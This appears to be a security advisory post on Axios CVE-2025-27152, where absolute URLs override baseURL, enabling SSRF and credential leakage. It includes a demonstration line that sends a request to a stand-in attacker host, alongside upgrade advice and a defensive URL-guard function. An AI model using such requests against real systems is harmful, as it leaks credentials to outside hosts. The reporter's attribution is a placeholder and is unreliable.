Axios is a popular promise-based HTTP client for both browser and Node.js applications. It is widely used due to its simplicity and ability to handle asynchronous requests efficiently. However, a recent vulnerability (CVE-2025-27152) has been identified in the library, which could potentially lead to Server Side Request Forgery (SSRF) and credential leakage when using absolute URLs instead of protocol-relative URLs.

In this post, we will discuss the details of this exploit, its implications, and how to protect your applications from this vulnerability. We will also provide a code snippet demonstrating the issue and links to original references.

Exploit Details

The vulnerability occurs when an absolute URL, such as https://example.com, rather than a protocol-relative URL, such as //example.com, is passed to Axios as the request URL. When the baseURL property is set on an Axios instance, the expectation is that requests stay confined to that base and a request aimed at some other absolute URL would be refused. That is not what happens: the absolute URL takes precedence over baseURL and the request is sent to it, which can lead to SSRF and credential leakage.

This issue affects both server-side and client-side usage of Axios, which significantly broadens its impact. If exploited, attackers could gain unauthorized access to sensitive data or perform actions on behalf of a targeted user.

The following code snippet demonstrates the issue:

const axios = require('axios');

// Client configured to talk to one trusted API only
const instance = axios.create({
  baseURL: 'https://my-secure-api.com',
});

// Expected: the absolute URL is refused or resolved against baseURL.
// Actual (affected versions): the absolute URL overrides baseURL and the
// request is sent to https://attacker.com
instance.get('https://attacker.com');

Original References

This vulnerability was first reported by GitHub user @author-name in a GitHub issue, which further links to the official CVE report.

Solution

This issue has been fixed in Axios version 1.8.2. To protect your applications from this vulnerability, it is highly recommended to update your Axios dependency to the latest version. You can do this by running the following command in your terminal:

npm install axios@latest

Additionally, you can mitigate the risk of SSRF and credential leakage by allowing only relative URLs, or by using a URL validation library to verify submitted URLs before they are passed to Axios.
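As an added example (not code from the original post or from the Axios project), the guard below implements the mitigation just described: it resolves a requested URL against the configured baseURL with Node's WHATWG URL parser and refuses anything whose origin or path prefix escapes the base, so the absolute-URL override shown earlier never reaches the HTTP client. The helper names resolveWithinBase and buildSafeRequest are assumptions.

```javascript
// Resolve `requested` against `baseURL` and return the absolute URL string
// only if it stays on the base origin and under the base path. Absolute URLs,
// protocol-relative URLs and '..' traversal that point elsewhere yield null.
function resolveWithinBase(baseURL, requested) {
  const base = new URL(baseURL);
  let resolved;
  try {
    resolved = new URL(requested, base); // '/x', '//host/x', 'https://host/x' all parse
  } catch (e) {
    return null; // unparsable input is rejected, not forwarded
  }
  if (resolved.origin !== base.origin) return null; // scheme, host or port differ
  // Normalise the base path to end with '/' so '/v1' cannot be matched by '/v1x'
  const basePath = base.pathname.endsWith('/') ? base.pathname : base.pathname + '/';
  if (!(resolved.pathname + '/').startsWith(basePath)) return null;
  return resolved.href;
}

// Build the request config the client would receive. The url is reduced to a
// path plus query relative to baseURL, so even a client with baseURL set never
// sees an absolute URL that could override it. Throws on anything rejected.
function buildSafeRequest(baseURL, requested, headers) {
  const href = resolveWithinBase(baseURL, requested);
  if (href === null) {
    throw new Error('request URL escapes baseURL: ' + requested);
  }
  const u = new URL(href);
  return { baseURL: baseURL, url: u.pathname + u.search, headers: headers || {} };
}

// Constructed sample: a path that stays on the API and one that does not.
const allowed = buildSafeRequest('https://my-secure-api.com', '/users?id=1',
  { Authorization: 'Bearer <constructed-token>' });
console.log('forwarding to', allowed.baseURL + allowed.url);
try {
  buildSafeRequest('https://my-secure-api.com', 'https://attacker.com/steal');
} catch (e) {
  console.log('blocked:', e.message);
}
```

The returned config can be passed straight to an Axios instance; the check runs before the library's own URL handling, so it does not depend on which Axios version is installed.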

Conclusion

CVE-2025-27152 is a severe vulnerability in Axios that could lead to SSRF and credential leakage. It is crucial to update your Axios dependency to the latest version (1.8.2 or later) and ensure that your applications handle URLs securely. By staying up-to-date with security updates and being proactive in your application security, you can greatly reduce the risk of falling victim to such exploits.

Timeline

Published on: 03/07/2025 16:15:38 UTC
Last modified on: 03/07/2025 20:15:38 UTC